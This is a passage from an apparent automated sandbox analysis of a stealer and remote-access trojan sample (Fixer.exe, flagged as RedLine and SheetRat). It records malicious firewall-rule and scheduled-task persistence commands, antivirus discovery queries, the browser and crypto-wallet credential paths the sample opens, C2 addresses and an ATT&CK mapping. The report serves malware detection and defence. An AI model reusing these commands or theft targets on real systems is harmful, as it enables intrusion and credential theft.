                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52866509335.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52877664599.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52889295522.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.0000000003129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\qemu-ga
                      Source: Fixer.exe, 00000000.00000002.52599130900.0000000000E61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3C7198 rdtsc 2_2_00007FFA1B3C7198
                      Source: C:\Users\user\Desktop\Fixer.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\Defender.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\Defender.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\Defender.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Fixer.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\FixerNerest.exe "C:\Users\user\AppData\Local\Temp\FixerNerest.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name="7=PG%XL(%PSA%R" dir=in action=allow program="C:\Windows\System32\xdwdSecurityHealthSystrays.exe" enable=yes & exitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\Defender.exe "C:\Windows\System32\Defender.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST
                      Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Users\user\Desktop\Fixer.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FixerNerest.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeQueries volume information: C:\Windows\System32\xdwdSecurityHealthSystrays.exe VolumeInformation
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeQueries volume information: C:\Windows\System32\xdwdSecurityHealthSystrays.exe VolumeInformation
                      Source: C:\Windows\System32\Defender.exeQueries volume information: C:\Windows\System32\Defender.exe VolumeInformation
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeQueries volume information: C:\Windows\System32\xdwdSecurityHealthSystrays.exe VolumeInformation
                      Source: C:\Windows\System32\Defender.exeQueries volume information: C:\Windows\System32\Defender.exe VolumeInformation
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeQueries volume information: C:\Windows\System32\xdwdSecurityHealthSystrays.exe VolumeInformation
                      Source: C:\Windows\System32\Defender.exeQueries volume information: C:\Windows\System32\Defender.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Modifies the windows firewall
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name="7=PG%XL(%PSA%R" dir=in action=allow program="C:\Windows\System32\xdwdSecurityHealthSystrays.exe" enable=yes & exit
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52854929641.000000001B3BE000.00000004.00000020.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52839355797.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52861531971.000000001B686000.00000004.00000020.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52882971819.000000001B580000.00000004.00000020.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52882315101.000000001B515000.00000004.00000020.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52896577157.000000001B399000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000014.00000002.53586488043.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000014.00000002.53603195774.000000001B6D0000.00000004.00000020.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52910259990.000000001B314000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000016.00000002.52917676072.0000000000C58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: Fixer.exe, type: SAMPLE
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.0.Fixer.exe.670000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.52343849796.0000000000672000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Fixer.exe PID: 7492, type: MEMORYSTR
                      Yara detected SheetRat
                      Source: Yara matchFile source: 2.2.6z9uno0baqvej0me.exe.12803b30.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.6z9uno0baqvej0me.exe.12803b30.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.52853780716.00000000127E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6z9uno0baqvej0me.exe PID: 5376, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\walletsLR
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q&%localappdata%\Coinomi\Coinomi\walletsLR
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                      Source: Yara matchFile source: 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Fixer.exe PID: 7492, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: Fixer.exe, type: SAMPLE
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.0.Fixer.exe.670000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.52343849796.0000000000672000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Fixer.exe PID: 7492, type: MEMORYSTR
                      Yara detected SheetRat
                      Source: Yara matchFile source: 2.2.6z9uno0baqvej0me.exe.12803b30.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.6z9uno0baqvej0me.exe.12803b30.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.52853780716.00000000127E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6z9uno0baqvej0me.exe PID: 5376, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
                      Windows Management Instrumentation                      		1
                      Scheduled Task/Job                      		11
                      Process Injection                      		121
                      Masquerading                      		1
                      OS Credential Dumping                      		541
                      Security Software Discovery                      		Remote Services1
                      Screen Capture                      		2
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		2
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		11
                      Disable or Modify Tools                      		LSASS Memory1
                      Process Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		11
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      DLL Side-Loading                      		2
                      Registry Run Keys / Startup Folder                      		341
                      Virtualization/Sandbox Evasion                      		Security Account Manager341
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares3
                      Data from Local System                      		1
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      DLL Side-Loading                      		11
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeylogging12
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Software Packing                      		Cached Domain Credentials213
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Timestomp                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585853 Sample: Fixer.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 70 et-seattle.gl.at.ply.gg 2->70 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 10 other signatures 2->82 9 Fixer.exe 20 7 2->9         started        14 xdwdSecurityHealthSystrays.exe 2->14         started        16 xdwdSecurityHealthSystrays.exe 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 74 89.23.97.121, 1112, 1911, 49748 MAXITEL-ASRU Russian Federation 9->74 64 C:\Users\user\AppData\...\FixerNerest.exe, PE32 9->64 dropped 66 C:\Users\user\...\6z9uno0baqvej0me.exe, PE32 9->66 dropped 68 C:\Users\user\AppData\Local\...\Fixer.exe.log, ASCII 9->68 dropped 110 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 9->110 112 Found many strings related to Crypto-Wallets (likely being stolen) 9->112 114 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 9->114 116 2 other signatures 9->116 20 6z9uno0baqvej0me.exe 1 4 9->20         started        24 FixerNerest.exe 3 9->24         started        file6 signatures7 process8 file9 60 C:\Windows\...\xdwdSecurityHealthSystrays.exe, PE32 20->60 dropped 84 Antivirus detection for dropped file 20->84 86 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->86 88 Creates an undocumented autostart registry key 20->88 96 6 other signatures 20->96 26 xdwdSecurityHealthSystrays.exe 20->26         started        29 cmd.exe 1 20->29         started        31 cmd.exe 1 20->31         started        33 cmd.exe 20->33         started        62 C:\Windows\System32\Defender.exe, PE32 24->62 dropped 90 Machine Learning detection for dropped file 24->90 92 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 24->92 94 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 24->94 35 Defender.exe 24->35         started        38 cmd.exe 24->38         started        40 cmd.exe 24->40         started        42 WmiPrvSE.exe 24->42         started        signatures10 process11 dnsIp12 98 Antivirus detection for dropped file 26->98 100 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->100 102 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 26->102 104 Queries memory information (via WMI often done to detect virtual machines) 26->104 106 Uses schtasks.exe or at.exe to add and modify task schedules 29->106 44 conhost.exe 29->44         started        46 conhost.exe 31->46         started        48 schtasks.exe 1 31->48         started        50 conhost.exe 33->50         started        52 schtasks.exe 33->52         started        72 et-seattle.gl.at.ply.gg 147.185.221.24, 61069 SALSGIVERUS United States 35->72 108 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 35->108 54 conhost.exe 38->54         started        56 schtasks.exe 38->56         started        58 conhost.exe 40->58         started        signatures13 process14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Fixer.exe68%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz
                      Fixer.exe79%VirustotalBrowse
                      Fixer.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Windows\System32\Defender.exe100%AviraTR/Crypt.OPACK.Gen
                      C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe100%AviraHEUR/AGEN.1310090
                      C:\Windows\System32\xdwdSecurityHealthSystrays.exe100%AviraTR/Crypt.OPACK.Gen
                      C:\Users\user\AppData\Local\Temp\FixerNerest.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe100%Joe Sandbox ML

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://89.23.97.121:19110%Avira URL Cloudsafe
                      89.23.97.121:11120%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      et-seattle.gl.at.ply.gg
                      		147.185.221.24
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        89.23.97.121:1112true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/02/sc/sctFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/chrome_newtabFixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchFixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drfalse
                                      		high
                                      http://89.23.97.121:1911Fixer.exe, 00000000.00000002.52600457326.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id23ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/Entity/Id12ResponseFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
